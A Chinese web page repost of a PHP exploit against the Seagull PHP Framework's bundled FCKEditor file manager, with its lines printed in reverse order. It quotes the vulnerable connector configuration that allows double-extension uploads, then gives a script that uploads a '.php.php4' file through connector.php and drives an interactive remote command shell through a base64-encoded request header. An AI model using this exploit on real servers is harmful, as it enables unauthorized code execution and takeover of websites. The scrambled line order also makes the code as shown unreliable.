seagull php framewor

发布时间:2014-10-25 14:34
文 章
摘 要
?> } else break; } print "\n{$shell[1]}"; $shell = explode("_code_", $output); if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); $output = http_send($host, $packet); $packet.= "Connection: close\r\n\r\n"; $packet.= "C


?>
}
else break;
}
print "\n{$shell[1]}";
$shell = explode("_code_", $output);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$output = http_send($host, $packet);
$packet.= "Connection: close\r\n\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Host: {$host}\r\n";
$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
{
if ($cmd != "exit")
$cmd = trim(fgets(STDIN));
print "\nseagull-shell# ";
{
while(1)
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
$packet .= $payload;
$packet .= "Connection: close\r\n\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Host: {$host}\r\n";
$packet = "POST {$path}{$connector}?Command=FileUploadType=FileCurrentFolder=%2f HTTP/1.0\r\n";
$payload .= "--o0oOo0o--\r\n";
$payload .= "\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
$payload = "--o0oOo0o\r\n";
$connector = "tinyfck/filemanager/connectors/php/connector.php";
$filename = md5(time()).".php.php4";
$path = $argv[2];
$host = $argv[1];
}
die();
print "\nExample....: php $argv[0] localhost /seagull/\n";
print "\nExample....: php $argv[0] localhost /";
print "\nUsage......: php $argv[0] host path\n";
{
if ($argc
print "\n+--------------------------------------------------------------------+\n";
print "\n Seagull
print "\n+--------------------------------------------------------------------+";
}
return $resp;
fclose($sock);
while (!feof($sock)) $resp .= fread($sock, 1024);
fputs($sock, $packet);
}
$sock = fsockopen($host, 80);
print "\n[-] No response from {$host}:80 Trying again...";
{
while (!$sock)
$sock = fsockopen($host, 80);
{
function http_send($host, $packet)
define(STDIN, fopen("php://stdin", "r"));
ini_set("default_socket_timeout", 5);
set_time_limit(0);
error_reporting(0);
*/
files containing malicious PHP code due to multiple file extensions isn't properly checked
with a default configuration of this script, an attacker might be able to upload arbitrary

55.$Config['DeniedExtensions']['Media'] = array() ;
54.$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
53.
52.$Config['DeniedExtensions']['Flash'] = array() ;
51.$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
50.
49.$Config['DeniedExtensions']['Image'] = array() ;
48.$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
47.
46.$Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
45.$Config['AllowedExtensions']['File'] = array() ;
44.
43.$Config['UserFilesAbsolutePath'] = SGL_网页_ROOT.'/images/';
42.// Attention: The above 'UserFilesPath' must point to the same directory.
41.// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
40.// user files directory. Usefull if you are using a virtual directory, symbolic
39.// Fill the following value it you prefer to specify the absolute path for the
38.
37.$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
36.// Path to user files relative to the document root.
35.
34.$Config['Enabled'] = true ;
33.// SECURITY: You must explicitelly enable this "connector". (Set it to "true").

[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
link.....: http://seagullproject.org/

mail.....: n0b0d13s[at]gmail[dot]com
author...: EgiX

------------------------------------------------------------------------
Seagull PHP Framework
------------------------------------------------------------------------
/*


FCKEditor

上一篇:神仙大乱斗《天天爱萌仙》ios限免公测
下一篇:从基本上遏制工具狗野病毒的6个办法